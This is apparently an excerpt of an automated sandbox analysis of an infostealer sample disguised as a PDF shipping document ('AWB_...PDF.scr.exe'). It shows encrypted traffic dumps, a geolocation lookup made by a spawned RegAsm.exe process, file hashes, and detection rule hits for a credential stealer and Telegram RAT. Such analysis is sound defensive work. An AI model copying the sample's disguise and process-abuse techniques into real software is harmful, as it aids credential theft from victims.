                                                                              2025-02-21 07:57:32 UTC8192INData Raw: 78 dd 31 96 ea 1f 55 12 38 d5 ae 48 63 46 e6 e7 ba 9e ba c8 ef 75 7d 46 b1 75 59 4c fa 3a 19 ae f3 0b bb cd e9 96 a4 4a 22 89 78 01 66 4f 97 d8 74 24 33 16 b0 c6 96 38 d6 3a ff b9 66 43 10 bd 06 a1 e9 10 4c f9 e2 ed b4 e1 5d 53 55 62 94 47 fb c8 57 97 26 de 0d 20 33 e0 90 91 d8 91 65 50 33 45 41 ad 97 c1 a1 56 b1 9b b9 21 6c 80 51 aa aa 4e a2 e8 f7 58 31 8c ee 03 d5 c5 70 8e 11 c4 ef 81 9b ad 3f e2 f6 e6 6a 81 f0 f7 46 46 0c 7d 9c f9 1d b5 4a e9 8a a0 86 a8 56 b0 2d a7 08 03 8d 7b ae c2 22 8c 22 7c 97 49 c8 b2 5e 9d 7e c0 d6 17 0a ae f4 55 87 20 13 c7 98 33 20 ed 16 7a d1 29 c9 64 6b d3 b3 98 07 56 ce c9 7c b9 24 dc 8a 94 ce 13 16 ea ea 7f 71 f9 1d 10 4f e8 2f 25 e2 ab 40 76 08 48 8c d5 17 90 9c 4d 28 2e ef 2c e6 09 90 a3 9c 7b ac 61 18 3a 25 08 f0 cc 7f
                                                                              Data Ascii: x1U8HcFu}FuYL:J"xfOt$38:fCL]SUbGW& 3eP3EAV!lQNX1p?jFF}JV-{""|I^~U 3 z)dkV|$qO/%@vHM(.,{a:%
                                                                              2025-02-21 07:57:32 UTC8192INData Raw: cf 3f fc 0f 55 b9 ec 17 89 d5 84 c8 7c 5d 20 c4 b8 cb e1 bf 27 e1 a7 ee 15 ff c3 1f 94 ba 24 f0 ff 9e 2e e9 16 58 0e 09 0e 0a 94 75 70 2b cc e5 6c 02 c9 7a d2 7c 65 6f 00 ea 72 85 a3 e1 85 17 0e 9a 3b 8d 7c a2 ec 4d f9 4b 90 de f8 2d 5e 0a cc 45 c4 31 8f 8a d6 61 fa 43 36 21 e5 03 1d f2 cf 41 78 8b bc b3 ac 5a ea cd ac b7 3b 28 89 58 f2 f0 26 3b b4 a9 f3 6b e6 09 10 de b4 27 30 f8 12 bc b7 36 8c 49 57 3e 08 55 fc 8a 51 b6 4c 58 b4 6a c1 f0 e7 2a de b7 09 34 76 fd 5e e8 c9 f1 a9 b7 a2 b4 1f c1 e5 31 89 e8 9a 87 e8 55 1d 24 c7 ef 26 59 2c d9 0a d4 65 bb ef 88 a4 2e b5 7a 73 f2 41 4a 26 3b 8e 48 85 71 83 19 d8 cb 50 7e 37 4c 25 32 54 15 35 6b d3 82 fa 98 53 e9 5d 10 88 a9 cf c0 69 4d 33 d0 19 be 34 a5 7c aa 04 cf a5 6e e3 35 f2 b3 4f 42 a0 1d d6 59 53 43 b7
                                                                              Data Ascii: ?U|] '$.Xup+lz|eor;|MK-^E1aC6!AxZ;(X&;k'06IW>UQLXj*4v^1U$&Y,e.zsAJ&;HqP~7L%2T5kS]iM34|n5OBYSC
                                                                              2025-02-21 07:57:32 UTC8192INData Raw: d4 64 63 ad 78 87 1e 81 03 43 bd d1 49 45 91 a5 1b 80 cb 00 9b 59 6f 98 57 6a 7a 51 88 50 dd 1c d8 7b 24 f2 57 3d e0 05 10 45 32 be 56 ab 5f 1b a9 24 d8 18 00 52 c8 33 b5 94 dd cc 13 26 4d 44 2d fc fd 60 b9 e1 f0 87 9c 80 db 60 00 3e 30 c5 33 e9 3d 2b 07 02 a7 0d 0a df fe 79 e2 71 23 43 d2 60 f3 05 7f 18 4c 16 33 ff 0b 27 76 09 df 1f 13 04 ea bc 26 37 85 1b 74 0a 7d 3e 8f ca 89 4b a6 c9 e2 b4 ca ac 02 b4 42 a3 63 62 15 61 06 5c ab 52 42 2e c8 b8 4a 96 75 55 1c 5c a2 6e 06 9b ad 83 d9 81 2b 60 54 e0 ee 42 3e 60 af 56 aa a9 3c d3 47 c0 ec ff ae 6e 9e d1 af 2d d7 67 87 cd 3d 09 9c 70 2b 74 f7 46 f3 21 e9 ad c2 fb 59 7d 7e d3 06 7f d4 34 d2 de e0 69 98 e7 03 9b 82 0e ce 84 74 50 1d df f1 e2 70 ec 9c ef 18 2f 43 12 3d 02 16 56 ca 5b 38 f8 c7 ec 25 86 da de 8d
                                                                              Data Ascii: dcxCIEYoWjzQP{$W=E2V_$R3&MD-``>03=+yq#C`L3'v&7t}>KBcba\RB.JuU\n+`TB>`V<Gn-g=p+tF!Y}~4itPp/C=V[8%


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.549935104.21.16.14437832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-02-21 07:58:23 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2025-02-21 07:58:24 UTC852INHTTP/1.1 200 OK
                                                                              Date: Fri, 21 Feb 2025 07:58:24 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 362
                                                                              Connection: close
                                                                              Age: 356472
                                                                              Cache-Control: max-age=31536000
                                                                              cf-cache-status: HIT
                                                                              last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Elvm4gYk9DIY3CNNdKL5GYnmWigfof07V8PHlcZo8s1PZkt125IqcN19hZExmIUdi%2B6Zjb6wK9mN1CTRcRzem%2FSnA4YWUqJOjDEfozQsBhbM77T5SYeVXiKJcxVMGBkC5duZwXQ"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 915530e80e7e41ba-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1753&min_rtt=1751&rtt_var=661&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1648785&cwnd=198&unsent_bytes=0&cid=e4b7b58781acba90&ts=176&x=0"
                                                                              2025-02-21 07:58:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:02:57:29
                                                                              Start date:21/02/2025
                                                                              Path:C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe"
                                                                              Imagebase:0x60000
                                                                              File size:340'992 bytes
                                                                              MD5 hash:5B95C93A80D1AADFC50C8F1CD4983F50
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2581612167.0000000005F70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000000.00000002.2573429947.000000000349F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2559006927.000000000242D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2573429947.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000000.00000002.2573429947.0000000003568000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:02:58:21
                                                                              Start date:21/02/2025
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                              Imagebase:0x10000
                                                                              File size:65'440 bytes
                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000004.00000002.3290043336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3291814644.00000000026EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3291814644.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Reset < >